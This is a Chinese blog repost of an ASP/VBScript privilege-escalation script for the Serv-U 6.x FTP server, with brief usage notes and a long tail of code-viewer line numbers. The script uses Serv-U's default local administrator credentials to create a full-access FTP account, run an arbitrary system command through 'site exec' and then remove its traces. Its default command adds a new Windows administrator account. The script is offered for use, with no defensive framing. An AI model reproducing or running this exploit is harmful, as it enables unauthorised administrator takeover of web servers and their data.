信息来源:http://www.cnsst.org/
Author:落叶纷飞
使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
Author:落叶纷飞
使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
1
<%@ LANGUAGE = VBScript %>
2
<%
3
Dim user, pass, port, ftpport, cmd, loginuser, loginpass, deldomain, mt, newdomain, newuser, quit
4
dim action
5
action=request("action")
6
if not isnumeric(action) then response.end
7
user = trim(request("u"))
8
pass = trim(request("p"))
9
port = trim(request("port"))
10
cmd = trim(request("c"))
11
f=trim(request("f"))
12
if f="" then
13
f=gpath()
14
else
15
f=left(f,2)
16
end if
17
ftpport = ffport
18
timeout=3
19![](/Images/OutliningIndicators/None.gif)
20
loginuser = "User " & user & vbCrLf
21
loginpass = "Pass " & pass & vbCrLf
22
deldomain = "-DELETEDOMAIN" & vbCrLf & "-IP=" & iip & vbCrLf & " PortNo=" & ftpport & vbCrLf
23
mt = "SITE MAINTENANCE" & vbCrLf
24
newdomain = "-SETDOMAIN" & vbCrLf & "-Domain=leaves|" & iip & "|" & ftpport & "|-1|1|0" & vbCrLf & "-TZOEnable=0" & vbCrLf & " TZOKey=" & vbCrLf
25
newuser = "-SETUSERSETUP" & vbCrLf & "-IP=0.0.0.0" & vbCrLf & "-PortNo=" & ftpport & vbCrLf & "-User=luo" & vbCrLf & "-Password=ye" & vbCrLf & _
26
"-HomeDir=c:\\" & vbCrLf & "-LoginMesFile=" & vbCrLf & "-Disable=0" & vbCrLf & "-RelPaths=1" & vbCrLf & _
27
"-NeedSecure=0" & vbCrLf & "-HideHidden=0" & vbCrLf & "-AlwaysAllowLogin=0" & vbCrLf & "-ChangePassword=0" & vbCrLf & _
28
"-QuotaEnable=0" & vbCrLf & "-MaxUsersLoginPerIP=-1" & vbCrLf & "-SpeedLimitUp=0" & vbCrLf & "-SpeedLimitDown=0" & vbCrLf & _
29
"-MaxNrUsers=-1" & vbCrLf & "-IdleTimeOut=600" & vbCrLf & "-SessionTimeOut=-1" & vbCrLf & "-Expire=0" & vbCrLf & "-RatioUp=1" & vbCrLf & _
30
"-RatioDown=1" & vbCrLf & "-RatiosCredit=0" & vbCrLf & "-QuotaCurrent=0" & vbCrLf & "-QuotaMaximum=0" & vbCrLf & _
31
"-Maintenance=System" & vbCrLf & "-PasswordType=Regular" & vbCrLf & "-Ratios=None" & vbCrLf & " Access=c:\\|RWAMELCDP" & vbCrLf
32
quit = "QUIT" & vbCrLf
33
newuser=replace(newuser,"c:",f)
34
select case action
35
case 1
36
set a=Server.CreateObject("Microsoft.XMLHTTP")
37
a.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s1",True, "", ""
38
a.send loginuser & loginpass & mt & deldomain & newdomain & newuser & quit
39
set session("a")=a
40
%>
41
<form method="post" name="leaves">
42
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
43
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
44
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
45
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
46
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
47
<input name="action" type="hidden" id="action" value="2"></form>
48
<script language="javascript">
49
document.write('<center>正在连接 127.0.0.1:<%=port%>,使用用户名: <%=user%>,口令:<%=pass%>
<center>');
50
setTimeout("document.all.leaves.submit();",4000);
51
</script>
52
<%
53
case 2
54
set b=Server.CreateObject("Microsoft.XMLHTTP")
55
b.open "GET", "http://127.0.0.1:" & ftpport & "/leaves/upadmin/s2", True, "", ""
56
b.send "User luo" & vbCrLf & "pass ye" & vbCrLf & "site exec " & cmd & vbCrLf & quit
57
set session("b")=b
58
%>
59
<form method="post" name="leaves">
60
<input name="u" type="hidden" id="u" value="<%=user%>"></td>
61
<input name="p" type="hidden" id="p" value="<%=pass%>"></td>
62
<input name="port" type="hidden" id="port" value="<%=port%>"></td>
63
<input name="c" type="hidden" id="c" value="<%=cmd%>" size="50">
64
<input name="f" type="hidden" id="f" value="<%=f%>" size="50">
65
<input name="action" type="hidden" id="action" value="3"></form>
66
<script language="javascript">
67
document.write('<center>正在提升权限,请等待
,<center>');
68
setTimeout("document.all.leaves.submit();",4000);
69
</script>
70
<%
71
case 3
72
set c=Server.CreateObject("Microsoft.XMLHTTP")
73
c.open "GET", "http://127.0.0.1:" & port & "/leaves/upadmin/s3", True, "", ""
74
c.send loginuser & loginpass & mt & deldomain & quit
75
set session("c")=c
76
%>
77
<center>提权完毕,已执行了命令:
78
<font color=red><%=cmd%></font>
79![](/Images/OutliningIndicators/None.gif)
80![](/Images/OutliningIndicators/None.gif)
81
<input type=button value=" 返回继续 " onClick="location.href='<%=gname()%>';">
82
</center>
83![](/Images/OutliningIndicators/None.gif)
84
<%
85
case else
86
on error resume next
87
set a=session("a")
88
set b=session("b")
89
set c=session("c")
90
a.abort
91
Set a = Nothing
92
b.abort
93
Set b = Nothing
94
c.abort
95
Set c = Nothing
96
%>
97
<center><form method="post" name="leaves">
98
<tr align="center" valign="middle">
99
<td colspan="2">Serv-U 6.X 提权脚本 by 落叶纷飞【S.S.T】 @ 肇庆</td>
100![](/Images/OutliningIndicators/None.gif)
101
</tr>
102
<tr align="center" valign="middle">
103
<td width="200">用户名:</td>
104![](/Images/OutliningIndicators/None.gif)
105
<td width="400"><input name="u" type="text" id="u" value="LocalAdministrator"></td>
106![](/Images/OutliningIndicators/None.gif)
107
</tr>
108
<tr align="center" valign="middle">
109
<td>口 令:</td>
110![](/Images/OutliningIndicators/None.gif)
111
<td><input name="p" type="text" id="p" value="#l@$ak#.lk;0@P"></td>
112![](/Images/OutliningIndicators/None.gif)
113
</tr>
114
<tr align="center" valign="middle">
115
<td>端 口:</td>
116![](/Images/OutliningIndicators/None.gif)
117
<td><input name="port" type="text" id="port" value="43958"></td>
118![](/Images/OutliningIndicators/None.gif)
119
服务器端口:
120![](/Images/OutliningIndicators/None.gif)
121
<td><input name="ffport" type="text" id="ffport" value="65500"></td>
122![](/Images/OutliningIndicators/None.gif)
123
服务器IP:
124![](/Images/OutliningIndicators/None.gif)
125
<td><input name="iip" type="text" id="iip" value="0.0.0.0"></td>
126![](/Images/OutliningIndicators/None.gif)
127
</tr>
128
<tr align="center" valign="middle">
129
<td>系统路径:</td>
130![](/Images/OutliningIndicators/None.gif)
131
<td><input name="f" type="text" id="f" value="<%=f%>" size="8"></td>
132![](/Images/OutliningIndicators/None.gif)
133
</tr>
134
<tr align="center" valign="middle">
135
<td>命 令:</td>
136![](/Images/OutliningIndicators/None.gif)
137
<td><input name="c" type="text" id="c" value="cmd /c net user leaves cnsst /add & net localgroup administrators leaves /add" size="50"></td>
138![](/Images/OutliningIndicators/None.gif)
139
</tr>
140
<tr align="center" valign="middle">
141
<td colspan="2"><input type="submit" name="Submit" value="提交">
142
<input type="reset" name="Submit2" value="重置">
143
<input name="action" type="hidden" id="action" value="1"></td>
144
</tr>
145
</form></center>
146![](/Images/OutliningIndicators/None.gif)
147![](/Images/OutliningIndicators/None.gif)
148
使用方法:如果是6.4以下的保持默认即可,只要按你的需要修改执行的命令即可!如果为6.4请在“服务器端口”里填21,然后再在“服务器IP”中填写服务器的真实IP。
149
<% end select
150
function Gpath()
151
on error resume next
152
err.clear
153
set f=Server.CreateObject("Scripting.FileSystemObject")
154
if err.number>0 then
155
gpath="c:"
156
exit function
157
end if
158
gpath=f.GetSpecialFolder(0)
159
gpath=lcase(left(gpath,2))
160
set f=nothing
161
end function
162
Function GName()
163
If request.servervariables("SERVER_PORT")="80" Then
164
GName="http://" & request.servervariables("server_name")&lcase(request.servervariables("script_name"))
165
Else
166
GName="http://" & request.servervariables("server_name")&":"&request.servervariables("SERVER_PORT")&lcase(request.servervariables("script_name"))
167
End If
168
End Function
169
%>
170![](/Images/OutliningIndicators/None.gif)
![](/Images/OutliningIndicators/None.gif)
2
![](/Images/OutliningIndicators/None.gif)
3
![](/Images/OutliningIndicators/None.gif)
4
![](/Images/OutliningIndicators/None.gif)
5
![](/Images/OutliningIndicators/None.gif)
6
![](/Images/OutliningIndicators/None.gif)
7
![](/Images/OutliningIndicators/None.gif)
8
![](/Images/OutliningIndicators/None.gif)
9
![](/Images/OutliningIndicators/None.gif)
10
![](/Images/OutliningIndicators/None.gif)
11
![](/Images/OutliningIndicators/None.gif)
12
![](/Images/OutliningIndicators/None.gif)
13
![](/Images/OutliningIndicators/None.gif)
14
![](/Images/OutliningIndicators/None.gif)
15
![](/Images/OutliningIndicators/None.gif)
16
![](/Images/OutliningIndicators/None.gif)
17
![](/Images/OutliningIndicators/None.gif)
18
![](/Images/OutliningIndicators/None.gif)
19
![](/Images/OutliningIndicators/None.gif)
20
![](/Images/OutliningIndicators/None.gif)
21
![](/Images/OutliningIndicators/None.gif)
22
![](/Images/OutliningIndicators/None.gif)
23
![](/Images/OutliningIndicators/None.gif)
24
![](/Images/OutliningIndicators/None.gif)
25
![](/Images/OutliningIndicators/None.gif)
26
![](/Images/OutliningIndicators/None.gif)
27
![](/Images/OutliningIndicators/None.gif)
28
![](/Images/OutliningIndicators/None.gif)
29
![](/Images/OutliningIndicators/None.gif)
30
![](/Images/OutliningIndicators/None.gif)
31
![](/Images/OutliningIndicators/None.gif)
32
![](/Images/OutliningIndicators/None.gif)
33
![](/Images/OutliningIndicators/None.gif)
34
![](/Images/OutliningIndicators/None.gif)
35
![](/Images/OutliningIndicators/None.gif)
36
![](/Images/OutliningIndicators/None.gif)
37
![](/Images/OutliningIndicators/None.gif)
38
![](/Images/OutliningIndicators/None.gif)
39
![](/Images/OutliningIndicators/None.gif)
40
![](/Images/OutliningIndicators/None.gif)
41
![](/Images/OutliningIndicators/None.gif)
42
![](/Images/OutliningIndicators/None.gif)
43
![](/Images/OutliningIndicators/None.gif)
44
![](/Images/OutliningIndicators/None.gif)
45
![](/Images/OutliningIndicators/None.gif)
46
![](/Images/OutliningIndicators/None.gif)
47
![](/Images/OutliningIndicators/None.gif)
48
![](/Images/OutliningIndicators/None.gif)
49
![](/Images/OutliningIndicators/None.gif)
![](https://www.cnblogs.com/Images/dot.gif)
50
![](/Images/OutliningIndicators/None.gif)
51
![](/Images/OutliningIndicators/None.gif)
52
![](/Images/OutliningIndicators/None.gif)
53
![](/Images/OutliningIndicators/None.gif)
54
![](/Images/OutliningIndicators/None.gif)
55
![](/Images/OutliningIndicators/None.gif)
56
![](/Images/OutliningIndicators/None.gif)
57
![](/Images/OutliningIndicators/None.gif)
58
![](/Images/OutliningIndicators/None.gif)
59
![](/Images/OutliningIndicators/None.gif)
60
![](/Images/OutliningIndicators/None.gif)
61
![](/Images/OutliningIndicators/None.gif)
62
![](/Images/OutliningIndicators/None.gif)
63
![](/Images/OutliningIndicators/None.gif)
64
![](/Images/OutliningIndicators/None.gif)
65
![](/Images/OutliningIndicators/None.gif)
66
![](/Images/OutliningIndicators/None.gif)
67
![](/Images/OutliningIndicators/None.gif)
![](https://www.cnblogs.com/Images/dot.gif)
68
![](/Images/OutliningIndicators/None.gif)
69
![](/Images/OutliningIndicators/None.gif)
70
![](/Images/OutliningIndicators/None.gif)
71
![](/Images/OutliningIndicators/None.gif)
72
![](/Images/OutliningIndicators/None.gif)
73
![](/Images/OutliningIndicators/None.gif)
74
![](/Images/OutliningIndicators/None.gif)
75
![](/Images/OutliningIndicators/None.gif)
76
![](/Images/OutliningIndicators/None.gif)
77
![](/Images/OutliningIndicators/None.gif)
78
![](/Images/OutliningIndicators/None.gif)
79
![](/Images/OutliningIndicators/None.gif)
80
![](/Images/OutliningIndicators/None.gif)
81
![](/Images/OutliningIndicators/None.gif)
82
![](/Images/OutliningIndicators/None.gif)
83
![](/Images/OutliningIndicators/None.gif)
84
![](/Images/OutliningIndicators/None.gif)
85
![](/Images/OutliningIndicators/None.gif)
86
![](/Images/OutliningIndicators/None.gif)
87
![](/Images/OutliningIndicators/None.gif)
88
![](/Images/OutliningIndicators/None.gif)
89
![](/Images/OutliningIndicators/None.gif)
90
![](/Images/OutliningIndicators/None.gif)
91
![](/Images/OutliningIndicators/None.gif)
92
![](/Images/OutliningIndicators/None.gif)
93
![](/Images/OutliningIndicators/None.gif)
94
![](/Images/OutliningIndicators/None.gif)
95
![](/Images/OutliningIndicators/None.gif)
96
![](/Images/OutliningIndicators/None.gif)
97
![](/Images/OutliningIndicators/None.gif)
98
![](/Images/OutliningIndicators/None.gif)
99
![](/Images/OutliningIndicators/None.gif)
100
![](/Images/OutliningIndicators/None.gif)
101
![](/Images/OutliningIndicators/None.gif)
102
![](/Images/OutliningIndicators/None.gif)
103
![](/Images/OutliningIndicators/None.gif)
104
![](/Images/OutliningIndicators/None.gif)
105
![](/Images/OutliningIndicators/None.gif)
106
![](/Images/OutliningIndicators/None.gif)
107
![](/Images/OutliningIndicators/None.gif)
108
![](/Images/OutliningIndicators/None.gif)
109
![](/Images/OutliningIndicators/None.gif)
110
![](/Images/OutliningIndicators/None.gif)
111
![](/Images/OutliningIndicators/None.gif)
112
![](/Images/OutliningIndicators/None.gif)
113
![](/Images/OutliningIndicators/None.gif)
114
![](/Images/OutliningIndicators/None.gif)
115
![](/Images/OutliningIndicators/None.gif)
116
![](/Images/OutliningIndicators/None.gif)
117
![](/Images/OutliningIndicators/None.gif)
118
![](/Images/OutliningIndicators/None.gif)
119
![](/Images/OutliningIndicators/None.gif)
120
![](/Images/OutliningIndicators/None.gif)
121
![](/Images/OutliningIndicators/None.gif)
122
![](/Images/OutliningIndicators/None.gif)
123
![](/Images/OutliningIndicators/None.gif)
124
![](/Images/OutliningIndicators/None.gif)
125
![](/Images/OutliningIndicators/None.gif)
126
![](/Images/OutliningIndicators/None.gif)
127
![](/Images/OutliningIndicators/None.gif)
128
![](/Images/OutliningIndicators/None.gif)
129
![](/Images/OutliningIndicators/None.gif)
130
![](/Images/OutliningIndicators/None.gif)
131
![](/Images/OutliningIndicators/None.gif)
132
![](/Images/OutliningIndicators/None.gif)
133
![](/Images/OutliningIndicators/None.gif)
134
![](/Images/OutliningIndicators/None.gif)
135
![](/Images/OutliningIndicators/None.gif)
136
![](/Images/OutliningIndicators/None.gif)
137
![](/Images/OutliningIndicators/None.gif)
138
![](/Images/OutliningIndicators/None.gif)
139
![](/Images/OutliningIndicators/None.gif)
140
![](/Images/OutliningIndicators/None.gif)
141
![](/Images/OutliningIndicators/None.gif)
142
![](/Images/OutliningIndicators/None.gif)
143
![](/Images/OutliningIndicators/None.gif)
144
![](/Images/OutliningIndicators/None.gif)
145
![](/Images/OutliningIndicators/None.gif)
146
![](/Images/OutliningIndicators/None.gif)
147
![](/Images/OutliningIndicators/None.gif)
148
![](/Images/OutliningIndicators/None.gif)
149
![](/Images/OutliningIndicators/None.gif)
150
![](/Images/OutliningIndicators/None.gif)
151
![](/Images/OutliningIndicators/None.gif)
152
![](/Images/OutliningIndicators/None.gif)
153
![](/Images/OutliningIndicators/None.gif)
154
![](/Images/OutliningIndicators/None.gif)
155
![](/Images/OutliningIndicators/None.gif)
156
![](/Images/OutliningIndicators/None.gif)
157
![](/Images/OutliningIndicators/None.gif)
158
![](/Images/OutliningIndicators/None.gif)
159
![](/Images/OutliningIndicators/None.gif)
160
![](/Images/OutliningIndicators/None.gif)
161
![](/Images/OutliningIndicators/None.gif)
162
![](/Images/OutliningIndicators/None.gif)
163
![](/Images/OutliningIndicators/None.gif)
164
![](/Images/OutliningIndicators/None.gif)
165
![](/Images/OutliningIndicators/None.gif)
166
![](/Images/OutliningIndicators/None.gif)
167
![](/Images/OutliningIndicators/None.gif)
168
![](/Images/OutliningIndicators/None.gif)
169
![](/Images/OutliningIndicators/None.gif)
170
![](/Images/OutliningIndicators/None.gif)